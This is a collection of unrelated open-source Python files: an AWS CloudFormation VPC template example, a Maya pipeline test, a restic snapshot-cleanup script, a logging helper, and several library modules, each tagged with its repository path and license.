'm2.4xlarge': {'Arch': 'PV64'},
'm3.medium': {'Arch': 'HVM64'},
'm3.large': {'Arch': 'HVM64'},
'm3.xlarge': {'Arch': 'HVM64'},
'm3.2xlarge': {'Arch': 'HVM64'},
'c1.medium': {'Arch': 'PV64'},
'c1.xlarge': {'Arch': 'PV64'},
'c3.large': {'Arch': 'HVM64'},
'c3.xlarge': {'Arch': 'HVM64'},
'c3.2xlarge': {'Arch': 'HVM64'},
'c3.4xlarge': {'Arch': 'HVM64'},
'c3.8xlarge': {'Arch': 'HVM64'},
'g2.2xlarge': {'Arch': 'HVMG2'},
'r3.large': {'Arch': 'HVM64'},
'r3.xlarge': {'Arch': 'HVM64'},
'r3.2xlarge': {'Arch': 'HVM64'},
'r3.4xlarge': {'Arch': 'HVM64'},
'r3.8xlarge': {'Arch': 'HVM64'},
'i2.xlarge': {'Arch': 'HVM64'},
'i2.2xlarge': {'Arch': 'HVM64'},
'i2.4xlarge': {'Arch': 'HVM64'},
'i2.8xlarge': {'Arch': 'HVM64'},
'hi1.4xlarge': {'Arch': 'HVM64'},
'hs1.8xlarge': {'Arch': 'HVM64'},
'cr1.8xlarge': {'Arch': 'HVM64'},
'cc2.8xlarge': {'Arch': 'HVM64'},
})
t.add_mapping('AWSRegionArch2AMI', {
'us-east-1': {'PV64': 'ami-50842d38', 'HVM64': 'ami-08842d60',
'HVMG2': 'ami-3a329952'},
'us-west-2': {'PV64': 'ami-af86c69f', 'HVM64': 'ami-8786c6b7',
'HVMG2': 'ami-47296a77'},
'us-west-1': {'PV64': 'ami-c7a8a182', 'HVM64': 'ami-cfa8a18a',
'HVMG2': 'ami-331b1376'},
'eu-west-1': {'PV64': 'ami-aa8f28dd', 'HVM64': 'ami-748e2903',
'HVMG2': 'ami-00913777'},
'ap-southeast-1': {'PV64': 'ami-20e1c572', 'HVM64': 'ami-d6e1c584',
'HVMG2': 'ami-fabe9aa8'},
'ap-northeast-1': {'PV64': 'ami-21072820', 'HVM64': 'ami-35072834',
'HVMG2': 'ami-5dd1ff5c'},
'ap-southeast-2': {'PV64': 'ami-8b4724b1', 'HVM64': 'ami-fd4724c7',
'HVMG2': 'ami-e98ae9d3'},
'sa-east-1': {'PV64': 'ami-9d6cc680', 'HVM64': 'ami-956cc688',
'HVMG2': 'NOT_SUPPORTED'},
'cn-north-1': {'PV64': 'ami-a857c591', 'HVM64': 'ami-ac57c595',
'HVMG2': 'NOT_SUPPORTED'},
'eu-central-1': {'PV64': 'ami-a03503bd', 'HVM64': 'ami-b43503a9',
'HVMG2': 'ami-b03503ad'},
})
ref_stack_id = Ref('AWS::StackId')
ref_region = Ref('AWS::Region')
ref_stack_name = Ref('AWS::StackName')
VPC = t.add_resource(
VPC(
'VPC',
CidrBlock='10.0.0.0/16',
Tags=Tags(
Application=ref_stack_id)))
subnet = t.add_resource(
Subnet(
'Subnet',
CidrBlock='10.0.0.0/24',
VpcId=Ref(VPC),
Tags=Tags(
Application=ref_stack_id)))
internetGateway = t.add_resource(
InternetGateway(
'InternetGateway',
Tags=Tags(
Application=ref_stack_id)))
gatewayAttachment = t.add_resource(
VPCGatewayAttachment(
'AttachGateway',
VpcId=Ref(VPC),
InternetGatewayId=Ref(internetGateway)))
routeTable = t.add_resource(
RouteTable(
'RouteTable',
VpcId=Ref(VPC),
Tags=Tags(
Application=ref_stack_id)))
route = t.add_resource(
Route(
'Route',
DependsOn='AttachGateway',
GatewayId=Ref('InternetGateway'),
DestinationCidrBlock='0.0.0.0/0',
RouteTableId=Ref(routeTable),
))
subnetRouteTableAssociation = t.add_resource(
SubnetRouteTableAssociation(
'SubnetRouteTableAssociation',
SubnetId=Ref(subnet),
RouteTableId=Ref(routeTable),
))
networkAcl = t.add_resource(
NetworkAcl(
'NetworkAcl',
VpcId=Ref(VPC),
Tags=Tags(
Application=ref_stack_id),
))
inBoundPrivateNetworkAclEntry = t.add_resource(
NetworkAclEntry(
'InboundHTTPNetworkAclEntry',
NetworkAclId=Ref(networkAcl),
RuleNumber='100',
Protocol='6',
PortRange=PortRange(To='80', From='80'),
Egress='false',
RuleAction='allow',
CidrBlock='0.0.0.0/0',
))
inboundSSHNetworkAclEntry = t.add_resource(
NetworkAclEntry(
'InboundSSHNetworkAclEntry',
NetworkAclId=Ref(networkAcl),
RuleNumber='101',
Protocol='6',
PortRange=PortRange(To='22', From='22'),
Egress='false',
RuleAction='allow',
CidrBlock='0.0.0.0/0',
))
inboundResponsePortsNetworkAclEntry = t.add_resource(
NetworkAclEntry(
'InboundResponsePortsNetworkAclEntry',
NetworkAclId=Ref(networkAcl),
RuleNumber='102',
Protocol='6',
PortRange=PortRange(To='65535', From='1024'),
Egress='false',
RuleAction='allow',
CidrBlock='0.0.0.0/0',
))
outBoundHTTPNetworkAclEntry = t.add_resource(
NetworkAclEntry(
'OutBoundHTTPNetworkAclEntry',
NetworkAclId=Ref(networkAcl),
RuleNumber='100',
Protocol='6',
PortRange=PortRange(To='80', From='80'),
Egress='true',
RuleAction='allow',
CidrBlock='0.0.0.0/0',
))
outBoundHTTPSNetworkAclEntry = t.add_resource(
NetworkAclEntry(
'OutBoundHTTPSNetworkAclEntry',
NetworkAclId=Ref(networkAcl),
RuleNumber='101',
Protocol='6',
PortRange=PortRange(To='443', From='443'),
Egress='true',
RuleAction='allow',
CidrBlock='0.0.0.0/0',
))
outBoundResponsePortsNetworkAclEntry = t.add_resource(
NetworkAclEntry(
'OutBoundResponsePortsNetworkAclEntry',
NetworkAclId=Ref(networkAcl),
RuleNumber='102',
Protocol='6',
PortRange=PortRange(To='65535', From='1024'),
Egress='true',
RuleAction='allow',
CidrBlock='0.0.0.0/0',
))
subnetNetworkAclAssociation = t.add_resource(
SubnetNetworkAclAssociation(
'SubnetNetworkAclAssociation',
SubnetId=Ref(subnet),
NetworkAclId=Ref(networkAcl),
))
instanceSecurityGroup = t.add_resource(
SecurityGroup(
'InstanceSecurityGroup',
GroupDescription='Enable SSH access via port 22',
SecurityGroupIngress=[
SecurityGroupRule(
IpProtocol='tcp',
FromPort='22',
ToPort='22',
CidrIp=Ref(sshlocation_param)),
SecurityGroupRule(
IpProtocol='tcp',
FromPort='80',
ToPort='80',
CidrIp='0.0.0.0/0')],
VpcId=Ref(VPC),
))
instance_metadata = Metadata(
Init({
'config': InitConfig(
packages={'yum': {'httpd': []}},
files=InitFiles({
'/var/www/html/index.html': InitFile(content=Join('\n',
[
'<img \
src="https://s3.amazonaws.com/cloudformation-examples/\
cloudformation_graphic.png" alt="AWS CloudFormation Logo"/>',
'<h1>\
Congratulations, you have successfully launched the AWS CloudFormation sample.\
</h1>']),
mode='000644',
owner='root',
group='root'),
'/etc/cfn/cfn-hup.conf': InitFile(content=Join('',
['[main]\n',
'stack=',
ref_stack_id,
'\n',
'region=',
ref_region,
'\n',
]),
mode='000400',
owner='root',
group='root'),
'/etc/cfn/hooks.d/cfn-auto-reloader.conf': InitFile(
content=Join('',
['[cfn-auto-reloader-hook]\n',
'triggers=post.update\n',
'path=Resources.WebServerInstance.\
Metadata.AWS::CloudFormation::Init\n',
'action=/opt/aws/bin/cfn-init -v ',
' --stack ',
ref_stack_name,
' --resource WebServerInstance ',
' --region ',
ref_region,
'\n',
'runas=root\n',
]))}),
services={
'sysvinit': InitServices({
'httpd': InitService(
enabled=True,
ensureRunning=True),
'cfn-hup': InitService(
enabled=True,
ensureRunning=True,
files=[
'/etc/cfn/cfn-hup.conf',
'/etc/cfn/hooks.d/cfn-auto-reloader.conf'
])})})}))
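# How the pieces above fit together at boot time: the instance's UserData
# (below) runs cfn-init, which reads this AWS::CloudFormation::Init metadata
# to install httpd and write the files; the cfn-hup config it writes re-runs
# cfn-init whenever the stack metadata is updated; and cfn-signal reports
# success or failure back to the CreationPolicy (15-minute timeout) so stack
# creation only completes once bootstrapping has finished.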
instance = t.add_resource(
Instance(
'WebServerInstance',
Metadata=instance_metadata,
ImageId=FindInMap(
'AWSRegionArch2AMI',
Ref('AWS::Region'),
FindInMap(
'AWSInstanceType2Arch',
Ref(instanceType_param),
'Arch')),
InstanceType=Ref(instanceType_param),
KeyName=Ref(keyname_param),
NetworkInterfaces=[
NetworkInterfaceProperty(
GroupSet=[
Ref(instanceSecurityGroup)],
AssociatePublicIpAddress='true',
DeviceIndex='0',
DeleteOnTermination='true',
SubnetId=Ref(subnet))],
UserData=Base64(
Join(
'',
[
'#!/bin/bash -xe\n',
'yum update -y aws-cfn-bootstrap\n',
'/opt/aws/bin/cfn-init -v ',
' --stack ',
Ref('AWS::StackName'),
' --resource WebServerInstance ',
' --region ',
Ref('AWS::Region'),
'\n',
'/opt/aws/bin/cfn-signal -e $? ',
' --stack ',
Ref('AWS::StackName'),
' --resource WebServerInstance ',
' --region ',
Ref('AWS::Region'),
'\n',
])),
CreationPolicy=CreationPolicy(
ResourceSignal=ResourceSignal(
Timeout='PT15M')),
Tags=Tags(
Application=ref_stack_id),
))
ipAddress = t.add_resource(
EIP('IPAddress',
DependsOn='AttachGateway',
Domain='vpc',
InstanceId=Ref(instance)
))
t.add_output(
[Output('URL',
Description='Newly created application URL',
Value=Join('',
['http://',
GetAtt('WebServerInstance',
'PublicIp')]))])
print(t.to_json())
| ikben/troposphere | examples/VPC_single_instance_in_subnet.py | Python | bsd-2-clause | 14,764 |
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2015, Anima Istanbul
#
# This module is part of anima-tools and is released under the BSD 2
# License: http://www.opensource.org/licenses/BSD-2-Clause
import tempfile
import unittest
import pymel.core as pm
from stalker import (db, User, Repository, Status, FilenameTemplate, Structure,
StatusList, ImageFormat, Project, Task, Sequence, Shot,
Type, Version)
from anima.env.mayaEnv import previs, Maya
class ShotSplitterTestCase(unittest.TestCase):
"""tests the anima.env.maya.previs.ShotSplitter class
"""
def setUp(self):
"""create test data
"""
database_url = 'sqlite:///:memory:'
db.setup({'sqlalchemy.url': database_url})
db.init()
self.temp_repo_path = tempfile.mkdtemp()
self.user1 = User(
name='User 1',
login='User 1',
email='[email protected]',
password='12345'
)
self.repo1 = Repository(
name='Test Project Repository',
linux_path=self.temp_repo_path,
windows_path=self.temp_repo_path,
osx_path=self.temp_repo_path
)
self.status_new = Status.query.filter_by(code='NEW').first()
self.status_wip = Status.query.filter_by(code='WIP').first()
self.status_comp = Status.query.filter_by(code='CMPL').first()
self.task_template = FilenameTemplate(
name='Task Template',
target_entity_type='Task',
path='{{project.code}}/'
'{%- for parent_task in parent_tasks -%}'
'{{parent_task.nice_name}}/'
'{%- endfor -%}',
filename='{{version.nice_name}}'
'_v{{"%03d"|format(version.version_number)}}',
)
self.asset_template = FilenameTemplate(
name='Asset Template',
target_entity_type='Asset',
path='{{project.code}}/'
'{%- for parent_task in parent_tasks -%}'
'{{parent_task.nice_name}}/'
'{%- endfor -%}',
filename='{{version.nice_name}}'
'_v{{"%03d"|format(version.version_number)}}',
)
self.shot_template = FilenameTemplate(
name='Shot Template',
target_entity_type='Shot',
path='{{project.code}}/'
'{%- for parent_task in parent_tasks -%}'
'{{parent_task.nice_name}}/'
'{%- endfor -%}',
filename='{{version.nice_name}}'
'_v{{"%03d"|format(version.version_number)}}',
)
self.sequence_template = FilenameTemplate(
name='Sequence Template',
target_entity_type='Sequence',
path='{{project.code}}/'
'{%- for parent_task in parent_tasks -%}'
'{{parent_task.nice_name}}/'
'{%- endfor -%}',
filename='{{version.nice_name}}'
'_v{{"%03d"|format(version.version_number)}}',
)
self.structure = Structure(
name='Project Struture',
templates=[self.task_template, self.asset_template,
self.shot_template, self.sequence_template]
)
self.project_status_list = StatusList(
name='Project Statuses',
target_entity_type='Project',
statuses=[self.status_new, self.status_wip, self.status_comp]
)
self.image_format = ImageFormat(
name='HD 1080',
width=1920,
height=1080,
pixel_aspect=1.0
)
# create a test project
self.project = Project(
name='Test Project',
code='TP',
repository=self.repo1,
status_list=self.project_status_list,
structure=self.structure,
image_format=self.image_format
)
# create task hierarchy
#
# ASSETS
#
self.assets = Task(
name='Assets',
project=self.project,
responsible=[self.user1]
)
#
# SEQUENCES
#
self.sequences = Task(
name='Sequences',
project=self.project,
responsible=[self.user1]
)
self.seq001 = Sequence(
name='Seq001',
code='Seq001',
parent=self.sequences
)
self.scene_task = Task(
name='001_IST',
parent=self.seq001
)
self.scene_previs_type = Type(
name='Scene Previs',
code='Scene Previs',
target_entity_type='Task'
)
self.scene_previs = Task(
name='Scene Previs',
parent=self.scene_task,
type=self.scene_previs_type
)
self.shots = Task(
name='Shots',
parent=self.scene_task
)
self.shot1 = Shot(
name='Seq001_001_IST_0010',
code='Seq001_001_IST_0010',
parent=self.shots
)
# create shot tasks
self.previs = Task(
name='Previs',
parent=self.shot1
)
self.camera = Task(
name='Camera',
parent=self.shot1
)
self.animation = Task(
name='Animation',
parent=self.shot1
)
self.scene_assembly = Task(
name='SceneAssembly',
parent=self.shot1
)
self.lighting = Task(
name='Lighting',
parent=self.shot1
)
self.comp = Task(
name='Comp',
parent=self.shot1
)
# create maya files
self.maya_env = Maya()
pm.newFile(force=True)
sm = pm.PyNode('sequenceManager1')
seq1 = sm.create_sequence('001_IST')
# create 3 shots
shot1 = seq1.create_shot('shot1')
shot2 = seq1.create_shot('shot2')
shot3 = seq1.create_shot('shot3')
# set shot ranges
shot1.startFrame.set(1)
shot1.endFrame.set(100)
shot2.startFrame.set(101)
shot2.endFrame.set(200)
shot2.sequenceStartFrame.set(101)
shot3.startFrame.set(201)
shot3.endFrame.set(300)
shot3.sequenceStartFrame.set(201)
# save the file under scene previs
v = Version(task=self.scene_previs)
self.maya_env.save_as(v)
pm.newFile(force=1)
print(v.absolute_full_path)
def test_test_setup(self):
"""to test test setup
"""
pass
| sergeneren/anima | tests/env/maya/test_previs.py | Python | bsd-2-clause | 6,717 |
# MusicPlayer, https://github.com/albertz/music-player
# Copyright (c) 2012, Albert Zeyer, www.az2000.de
# All rights reserved.
# This code is under the 2-clause BSD license, see License.txt in the root directory of this project.
def queueMain():
from Player import PlayerEventCallbacks
from Queue import queue
from State import state
queue.fillUpTo() # add some right away if empty...
for ev, args, kwargs in state.updates.read():
if ev is PlayerEventCallbacks.onSongChange:
queue.fillUpTo()
| albertz/music-player | src/modules/mod_queue.py | Python | bsd-2-clause | 505 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import time
import getpass
import schedule
import configparser
import subprocess
import syslog
import json
import datetime
import dateutil.parser
from time import gmtime, strftime
from pytz import timezone
import pytz
from datetime import timedelta
# Configuration
restic_args = ''
restic_password = ''
# Load Configuration
config = configparser.ConfigParser()
config.read("pyresticd.cfg")
restic_args = "snapshots --json"
backup_interval_allowed = timedelta(days=int(config['cleanup']['interval_days']),
hours=int(config['cleanup']['interval_hours']),
minutes=int(config['cleanup']['interval_minutes']),
seconds=int(config['cleanup']['interval_seconds']))
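# The keys read above imply a config file roughly like this (section and key
# names taken from the code; the values are illustrative only):
#
#   [pyresticd]
#   repo = /path/to/restic-repo
#
#   [restic]
#   binary = /usr/local/bin/restic
#
#   [cleanup]
#   interval_days = 1
#   interval_hours = 0
#   interval_minutes = 0
#   interval_seconds = 0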
def snapshots_to_delete(password):
last_removed = False
removelist = [] # list of snapshots to be removed!
# run restic
args = [config['restic']['binary']] + restic_args.split()
ps = subprocess.Popen(args, env={
'RESTIC_PASSWORD': password,
'RESTIC_REPOSITORY': config['pyresticd']['repo'],
'PATH': os.environ['PATH'],
},
stdout=subprocess.PIPE,
)
#ps.wait()
json_input = ps.stdout.read()
json_parsed = json.loads(json_input)
last_backup = datetime.datetime(1, 1, 1, tzinfo=timezone('Europe/Berlin'))
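    # Thinning pass: walk the snapshots in the order restic returned them,
    # comparing each timestamp against the previous one (last_backup starts
    # as a far-past sentinel, so the first snapshot always survives). A
    # snapshot closer than the allowed interval is flagged for removal, and
    # the last_removed latch guarantees that two consecutive snapshots are
    # never both dropped.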
for data in json_parsed:
data_datum = dateutil.parser.parse(data['time'])
data_id = data['id'][:8]
print("--------------")
#print(data_datum.strftime('%d.%m.%Y %H:%M:%S'))
print(data_id + " || " + data['time'])
backup_interval_current = data_datum - last_backup
print(backup_interval_current)
if backup_interval_current < backup_interval_allowed and not last_removed:
last_removed = True
print("REMOVE")
removelist.append(data_id)
else:
last_removed = False
# save backup date for the next step
last_backup = data_datum
print("\nSummary for interval " + str(backup_interval_allowed) + "\n==========\n\nI found " + str(len(removelist)) + " of " + str(len(json_parsed)) + " snapshots to delete:\n")
remove_string = ""
for i in removelist:
print(i+" ", end='')
remove_string = remove_string + i + " "
print()
remove_command = config['restic']['binary'] + " -r " + config['pyresticd']['repo'] + " forget " + remove_string
print("Suggested command: \n")
print(remove_command)
if not restic_password and 'RESTIC_PASSWORD' in os.environ:
restic_password = os.environ['RESTIC_PASSWORD']
if not restic_password:
restic_password = getpass.getpass(
prompt='Please enter the restic encryption password: ')
print("Password entered.")
snapshots_to_delete(restic_password)
| Mebus/pyresticd | cleanup.py | Python | bsd-2-clause | 2,933 |
# -*- coding: utf-8 -*-
"""
The Logging component of the Server.
"""
import logging.handlers
################################################################################
class Logging:
"""
This class handles the console and file logging.
"""
def __init__(self, filename):
self._logger = logging.getLogger(filename)
self._logger.setLevel(logging.DEBUG)
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.ERROR)
file_handler = logging.handlers.RotatingFileHandler(
'logs/' + filename + '.log',
encoding = 'utf8',
maxBytes = 1048576, # 1 MB
backupCount = 2)
file_handler.setLevel(logging.DEBUG)
console_formatter = logging.Formatter(
"%(asctime)s - %(levelname)-7s - %(name)-21s - %(message)s",
"%Y-%m-%d %H:%M:%S")
file_formatter = logging.Formatter(
"%(asctime)s - %(levelname)-7s - %(message)s",
"%Y-%m-%d %H:%M:%S")
console_handler.setFormatter(console_formatter)
file_handler.setFormatter(file_formatter)
self._logger.addHandler(console_handler)
self._logger.addHandler(file_handler)
############################################################################
def get_logger(self):
"""
Method to return the logger.
@return: the logger
"""
return self._logger
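# Minimal usage sketch (assumes a writable logs/ directory, as required by
# the RotatingFileHandler path above):
#
#   log = Logging('server').get_logger()
#   log.info('written to logs/server.log only')
#   log.error('written to the file and shown on the console')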
| andreas-kowasch/DomainSearch | DomainSearchServer/additional/Logging.py | Python | bsd-2-clause | 1,463 |
#*******************************************************************************
# U n s u p e r v i s e d D e c o m p o s i t i o n B a s e *
#*******************************************************************************
class UnsupervisedDecompositionBase(object):
#human readable information
name = "Base Unsupervised Decomposition"
description = "virtual base class"
author = "HCI, University of Heidelberg"
homepage = "http://hci.iwr.uni-heidelberg.de"
def __init__(self):
pass
def decompose(self, features):
pass
def checkNumComponents(self, numChannels, numComponents):
if(numChannels < numComponents):
print "WARNING: The data set comprises", numChannels, "channels. Decomposition into more components (", numComponents, ") is not possible. Using", numChannels, "components instead."
return numChannels
if(numComponents < 1):
print "WARNING: Decomposition into less than one component is not possible. Using one component instead."
return 1
return numComponents
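    # Example of the clamping behaviour (hypothetical numbers):
    # checkNumComponents(numChannels=5, numComponents=8) returns 5 with a
    # warning, and numComponents=0 is raised to 1.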
# it is probably NOT a good idea to define this a class level (more than one PLSA
# instance with different numbers of components might exist), but in the current
# ilastik architecture this method is called before the instance is even created,
# so it HAS to be a class method for now
# workaround: set self.numComponents in init function
@classmethod
def setNumberOfComponents(cls, numComponents):
cls.numComponents = numComponents
| ilastik/ilastik-0.5 | ilastik/modules/unsupervised_decomposition/core/algorithms/unsupervisedDecompositionBase.py | Python | bsd-2-clause | 1,598 |
# proxy module
from __future__ import absolute_import
from apptools.help.help_plugin.help_doc import *
| enthought/etsproxy | enthought/help/help_plugin/help_doc.py | Python | bsd-3-clause | 103 |
# -*- coding: utf-8 -*-
# Copyright (c) 2013, Mayo Clinic
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of the <ORGANIZATION> nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
from rf2db.schema import rf2
from rf2db.parameterparser.ParmParser import ParameterDefinitionList, enumparam, intparam, computedparam, \
strparam, booleanparam
from rf2db.utils import urlutil
# Iteration Parameters
#
# order - sort order of returned values. The specific sort keys depend on the type of resource
# accessed. Possible values are I{asc} for ascending and I{desc} for descending. Default: "asc"
# maxtoreturn - maximum values to return in a list. 0 we're just doing a count. Default: 100
# page - starting page number. Return begins at entry C{page * maxtoreturn}. Default: 0
# locked - if True, only return locked records. (Must be accompanied by a changeset id)
# sort - list of columns to sort by "None" means don't sort at all
# TODO: the default on maxtoreturn needs to be pulled from the rf2 parameter set
iter_parms = ParameterDefinitionList()
iter_parms.order = enumparam(['asc', 'desc'], default='asc')
iter_parms.page = intparam(default=0)
iter_parms.maxtoreturn = intparam(default=20)
iter_parms.start = computedparam(lambda p: p.page * p.maxtoreturn)
iter_parms.sort = strparam(splittable=True)
iter_parms.locked = booleanparam(default=False)
class RF2Iterator(rf2.Iterator, object):
def setup(self, parmlist, autoSkip=False):
""" Create a directory listing. This can be used in a number of ways, including:
@param autoSkip: if True, append will skip the leading entries. If false, the client does the skipping
@type autoSkip: C{bool}
"""
self._parmlist = parmlist
self._skip = parmlist.page * parmlist.maxtoreturn if autoSkip else 0
# This is deliberately left off because it forces callers to invoke finish
# self.complete = complete
self.numEntries = 0
self.at_end = False
return self
def add_entry(self, entry, **kw):
""" Add the entry to the directory. If the skip count is positive, the entry will be skipped. The general
pattern that can be used in this call is:
for e in list:
            if not rval.add_entry(e):
rval.finish(True)
return rval
rval.finish(False)
@param entry: The entry to append
@type entry: C{DirectoryEntry}
@return: True if appending should continue, False if no more should be added
"""
if self._skip > 0:
self._skip -= 1
return True
if self._parmlist.maxtoreturn < 0 or self.numEntries < self._parmlist.maxtoreturn:
self.entry.append(entry)
self.numEntries += 1
self.at_end = self._parmlist.maxtoreturn > 0 and self.numEntries >= self._parmlist.maxtoreturn
return not self.at_end
def finish(self, moreToCome=False, total=0):
""" Finalize an appending process, setting COMPLETE, next and prev
Returns the resource for convenience
"""
if not self._parmlist.maxtoreturn:
self.numEntries = total
self.complete = rf2.CompleteDirectory.COMPLETE
else:
if self._parmlist.maxtoreturn > 0 and self.numEntries >= self._parmlist.maxtoreturn and moreToCome:
self.next = urlutil.forxml(urlutil.append_params(urlutil.strip_control_params(urlutil.relative_uri()),
dict(self._parmlist.nondefaulteditems(),
**{'page': str(self._parmlist.page + 1),
'maxtoreturn': str(self._parmlist.maxtoreturn)})))
if self._parmlist.maxtoreturn > 0 and self._parmlist.page > 0:
self.prev = urlutil.forxml(urlutil.append_params(urlutil.strip_control_params(urlutil.relative_uri()),
dict(self._parmlist.nondefaulteditems(),
**{'page': str(self._parmlist.page - 1),
'maxtoreturn': str(self._parmlist.maxtoreturn)})))
self.complete = rf2.CompleteDirectory.COMPLETE if not (
self.next or self.prev) else rf2.CompleteDirectory.PARTIAL
return self
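# rf2iterlink glues a generated pyxb binding to its RF2Iterator subclass: it
# registers the subclass as the superseding class for the pyxb complex type
# (so parsed documents instantiate it), and rebinds the class name to a small
# constructor that builds the element and calls setup() on it.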
def rf2iterlink(pyxbElement, pyxbType):
def impl_link(impl_class):
def constructor(parmlist, autoSkip=False):
return pyxbElement().setup(parmlist, autoSkip=autoSkip)
pyxbType._SetSupersedingClass(impl_class)
return constructor
return impl_link
@rf2iterlink(rf2.ConceptList, rf2.ConceptList_)
class RF2ConceptList(rf2.ConceptList_, RF2Iterator):
pass
@rf2iterlink(rf2.DescriptionList, rf2.DescriptionList_)
class RF2DescriptionList(rf2.DescriptionList_, RF2Iterator):
pass
@rf2iterlink(rf2.RelationshipList, rf2.RelationshipList_)
class RF2RelationshipList(rf2.RelationshipList_, RF2Iterator):
pass
@rf2iterlink(rf2.IdentifierList, rf2.IdentifierList_)
class RF2IdentifierList(rf2.IdentifierList_, RF2Iterator):
pass
@rf2iterlink(rf2.TransitiveClosureHistoryList, rf2.TransitiveClosureHistoryList_)
class RF2TransitiveClosureHistoryList(rf2.TransitiveClosureHistoryList_, RF2Iterator):
pass
@rf2iterlink(rf2.DescriptorReferenceSet, rf2.DescriptorReferenceSet_)
class RF2DescriptorReferenceSet(rf2.DescriptorReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.OrderedReferenceSet, rf2.OrderedReferenceSet_)
class RF2OrderedReferenceSet(rf2.OrderedReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.AttributeValueReferenceSet, rf2.AttributeValueReferenceSet_)
class RF2AttributeValueReferenceSet(rf2.AttributeValueReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.SimpleReferenceSet, rf2.SimpleReferenceSet_)
class RF2SimpleReferenceSet(rf2.SimpleReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.SimpleMapReferenceSet, rf2.SimpleMapReferenceSet_)
class RF2SimpleMapReferenceSet(rf2.SimpleMapReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.ComplexMapReferenceSet, rf2.ComplexMapReferenceSet_)
class RF2ComplexMapReferenceSet(rf2.ComplexMapReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.LanguageReferenceSet, rf2.LanguageReferenceSet_)
class RF2LanguageReferenceSet(rf2.LanguageReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.QuerySpecificationReferenceSet, rf2.QuerySpecificationReferenceSet_)
class RF2QuerySpecificationReferenceSet(rf2.QuerySpecificationReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.AnnotationReferenceSet, rf2.AnnotationReferenceSet_)
class RF2AnnotationReferenceSet(rf2.AnnotationReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.AssociationReferenceSet, rf2.AssociationReferenceSet_)
class RF2AssociationReferenceSet(rf2.AssociationReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.ModuleDepencencyReferenceSet, rf2.ModuleDepencencyReferenceSet_)
class RF2ModuleDepencencyReferenceSet(rf2.ModuleDepencencyReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.DescriptionFormatReferenceSet, rf2.DescriptionFormatReferenceSet_)
class RF2DescriptionFormatReferenceSet(rf2.DescriptionFormatReferenceSet_, RF2Iterator):
pass
@rf2iterlink(rf2.ChangeSetReferenceSet, rf2.ChangeSetReferenceSet_)
class RF2ChangeSetReferenceSet(rf2.ChangeSetReferenceSet_, RF2Iterator):
    pass
| cts2/rf2db | rf2db/parsers/RF2Iterator.py | Python | bsd-3-clause | 9,117 |
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Class for running uiautomator tests on a single device."""
from pylib.instrumentation import test_options as instr_test_options
from pylib.instrumentation import test_runner as instr_test_runner
class TestRunner(instr_test_runner.TestRunner):
"""Responsible for running a series of tests connected to a single device."""
def __init__(self, test_options, device, shard_index, test_pkg,
ports_to_forward):
"""Create a new TestRunner.
Args:
test_options: A UIAutomatorOptions object.
device: Attached android device.
shard_index: Shard index.
test_pkg: A TestPackage object.
ports_to_forward: A list of port numbers for which to set up forwarders.
Can be optionally requested by a test case.
"""
# Create an InstrumentationOptions object to pass to the super class
instrumentation_options = instr_test_options.InstrumentationOptions(
test_options.tool,
test_options.cleanup_test_files,
test_options.push_deps,
test_options.annotations,
test_options.exclude_annotations,
test_options.test_filter,
test_options.test_data,
test_options.save_perf_json,
test_options.screenshot_failures,
wait_for_debugger=False,
coverage_dir=None,
test_apk=None,
test_apk_path=None,
test_apk_jar_path=None)
super(TestRunner, self).__init__(instrumentation_options, device,
shard_index, test_pkg, ports_to_forward)
self.package_name = test_options.package_name
#override
def InstallTestPackage(self):
self.test_pkg.Install(self.adb)
#override
def PushDataDeps(self):
pass
#override
def _RunTest(self, test, timeout):
self.adb.ClearApplicationState(self.package_name)
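    # Tests annotated with Feature:FirstRunExperience need the first run
    # experience enabled, so drop --disable-fre for them; every other test
    # runs with the first run experience disabled.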
if 'Feature:FirstRunExperience' in self.test_pkg.GetTestAnnotations(test):
self.flags.RemoveFlags(['--disable-fre'])
else:
self.flags.AddFlags(['--disable-fre'])
return self.adb.RunUIAutomatorTest(
test, self.test_pkg.GetPackageName(), timeout)
| mogoweb/chromium-crosswalk | build/android/pylib/uiautomator/test_runner.py | Python | bsd-3-clause | 2,258 |
import numpy as np
import h5py
from checkpoint import Writer, create_reader
class Baz:
def __init__(self):
self.z = {1:'one', 'two': 2, 'tree': [1,2,'three']}
def write(self, group):
writer = Writer(group, self)
writer.yaml('z')
